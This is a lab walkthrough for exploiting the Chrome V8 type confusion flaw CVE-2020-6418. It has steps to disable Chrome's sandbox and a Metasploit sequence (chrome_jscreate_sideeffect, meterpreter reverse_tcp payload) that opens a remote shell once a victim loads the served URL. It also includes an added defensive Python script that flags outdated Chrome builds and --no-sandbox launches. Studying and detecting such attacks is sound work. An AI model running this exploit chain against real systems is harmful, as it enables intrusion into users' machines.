CVE-2020-6418 is a type confusion vulnerability in V8, the JavaScript engine in Google Chrome, affecting versions prior to 80.0.3987.122. A remote attacker can trigger it through a crafted HTML page and, in this walkthrough, obtain a shell on the target device.
Affected software:
- Google Chrome, versions prior to 80.0.3987.122.
Note: the Chrome browser must be running with the sandbox disabled (--no-sandbox) for this exploit to succeed.
Lab setup used here:
- Metasploit Framework
- OS: any
- Google Chrome v80.0.3987.87 on Windows 11 (offline installer: https://www.neowin.net/news/google-chrome-800398787-offline-installer/)
- Kali Linux v2021.1
i) Create a shortcut for Google Chrome.
ii) Right-click the shortcut, open Properties, and go to the "Target" field.
iii) At the end of the path to the EXE, add a space and enter --no-sandbox
iv) Click Apply, then OK.
v) Open Google Chrome from the shortcut; a warning bar appears stating the following:
You are using an unsupported command-line flag: --no-sandbox. Stability and security will suffer.
Demo video: nosandbox.mp4
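The two preconditions above (a Chrome build older than 80.0.3987.122 and a browser launched with --no-sandbox) are exactly what a defender should be hunting for in an inventory. The script below is an added example, not part of the original page; it parses Chrome version strings, compares them against the fixed version, and inspects the launch command line (a Windows shortcut target or a Linux process command line) for the --no-sandbox flag. The inventory records, host names and paths are constructed sample data, and the record layout is an assumption of this example.

```python
"""Defender-side check for the two preconditions of this walkthrough:
a Chrome build older than the fixed version 80.0.3987.122, and a browser
launched with --no-sandbox. Added example, not code from the original page.
"""
import re
import shlex

# First Chrome release carrying the fix for CVE-2020-6418 (value taken from the page).
FIXED_VERSION = (80, 0, 3987, 122)


def parse_version(text):
    """Turn '80.0.3987.87' into a comparable tuple of ints; ValueError otherwise."""
    m = re.fullmatch(r"\s*(\d+)\.(\d+)\.(\d+)\.(\d+)\s*", text)
    if not m:
        raise ValueError(f"not a Chrome version string: {text!r}")
    return tuple(int(p) for p in m.groups())


def is_vulnerable_version(version):
    """True when the installed build predates the fixed version."""
    return parse_version(version) < FIXED_VERSION


def sandbox_disabled(cmdline):
    """True if --no-sandbox appears as its own argument on the launch command line.

    posix=False keeps Windows backslashes intact and leaves the quotes around a
    quoted EXE path in place, so the flag is matched only as a separate token.
    """
    args = shlex.split(cmdline, posix=False)
    return any(a.strip('"') == "--no-sandbox" for a in args)


def assess(records):
    """Return (host, finding) pairs for every precondition found in the inventory.

    Each record is assumed to carry 'host', 'version' and 'cmdline' keys.
    """
    findings = []
    for r in records:
        if is_vulnerable_version(r["version"]):
            findings.append((r["host"], f"Chrome {r['version']} < 80.0.3987.122: update required"))
        if sandbox_disabled(r["cmdline"]):
            findings.append((r["host"], "launched with --no-sandbox: remove the flag from the shortcut or policy"))
    return findings


# Constructed sample inventory; host names and paths are not real systems.
SAMPLE = [
    {"host": "win-lab-01", "version": "80.0.3987.87",
     "cmdline": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --no-sandbox'},
    {"host": "win-lab-02", "version": "80.0.3987.122",
     "cmdline": r'"C:\Program Files\Google\Chrome\Application\chrome.exe"'},
    {"host": "lnx-lab-03", "version": "79.0.3945.130",
     "cmdline": "/opt/google/chrome/chrome --user-data-dir=/tmp/profile"},
]

if __name__ == "__main__":
    for host, finding in assess(SAMPLE):
        print(f"{host}: {finding}")
```

Running it against the sample inventory reports win-lab-01 twice (old build and sandbox disabled) and lnx-lab-03 once (old build); win-lab-02 is on the fixed version with the sandbox enabled and produces no finding.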
Since we are using Kali as the environment to carry out the exploit, Metasploit comes built into the distro. On other distros, Metasploit has to be set up before beginning the exploit.
Refer to the Metasploit installation documentation for details.
i) Start the Metasploit framework:
> msfconsole
ii) Find the exploit:
> search chrome_js
iii) Use the exploit module from the search output:
> use exploit/multi/browser/chrome_jscreate_sideeffect
iv) Provide the SRVHOST IP address:
> set SRVHOST <ip address>
v) Provide the target. There are two options here:
- Target 0: Windows
- Target 1: macOS
> set TARGET <number>
vi) Provide the payload:
> set PAYLOAD windows/x64/meterpreter/reverse_tcp
vii) Check the current settings and enabled options:
> show options
viii) Run the exploit:
> run    (or: > exploit)
ix) You will be provided with a URL, which must be opened in the browser for the session to become active.
x) Once the user accesses the URL, a session is created. To list sessions:
> sessions -l
xi) Using the session, we can check the system info or enter the shell:
> sessions -i <number>
> sysinfo
> shell